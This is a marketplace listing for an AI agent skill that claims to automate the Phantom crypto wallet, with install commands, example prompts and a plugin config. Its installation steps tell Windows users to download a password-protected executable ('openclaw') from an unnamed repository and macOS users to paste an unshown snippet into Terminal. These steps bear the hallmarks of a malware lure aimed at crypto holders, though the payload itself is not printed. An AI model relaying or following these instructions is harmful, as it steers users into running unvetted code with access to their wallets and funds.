phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate Phantom wallet tasks, manage Solana and EVM networks, and troubleshoot transactions easily with the OpenClaw Phantom AI agent skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-mdr3qWhat This Skill Does
The Phantom skill for OpenClaw AI acts as an advanced bridge between your browser-based Phantom wallet and your local development environment. It empowers the agent to manage multi-chain assets, configure RPC endpoints, troubleshoot stuck transactions, and handle account security across Solana, Ethereum, Polygon, and Base networks. By interfacing with the openclaw-agent, it turns browser-bound wallet actions into programmable, automated workflows.
Installation
- Ensure you have the
openclaw-agentutility installed: Windows users download the executable from the provided repository using the passopenclaw, while macOS users should execute the provided installation snippet in Terminal. - Install the skill via the OpenClaw hub:
clawhub install openclaw/skills/skills/hightower6eu/phantom-mdr3q. - Verify that the Phantom browser extension is correctly configured in your browser of choice (Chrome, Firefox, or Brave).
Use Cases
- Automated Network Switching: Instantly switch between custom RPCs for Solana or add EVM networks like Arbitrum and Polygon without manual interface clicking.
- Portfolio Management: Automatically fetch token accounts, track balances, and import new SPL token contract addresses as needed.
- Transaction Auditing: Use the agent to verify the status of pending transactions and calculate priority fees based on real-time network congestion.
- Account Security: Safely manage connection permissions to dApps and audit authorized websites directly through the AI interface.
Example Prompts
- "Phantom: Check my current SOL balance and list all SPL tokens associated with my primary wallet address."
- "Add the Arbitrum One network to my Phantom wallet configuration using the standard RPC and Chain ID settings."
- "My last transaction on Solana is stuck. Can you check the status of signature 5G5a... and advise if I need to increase the priority fee?"
Tips & Limitations
- Security First: Never share your private keys or seed phrases with the agent or any third party. The skill is designed to handle interactions, not store master credentials.
- Agent Prerequisites: The skill will fail silently if the
openclaw-agentis not running in the background. Always ensure the local utility is active before running commands. - Network Consistency: When using custom RPCs, ensure your API keys (e.g., Helius or Alchemy) are active and have sufficient request limits to avoid interruption during high-volume operations.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-mdr3q": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.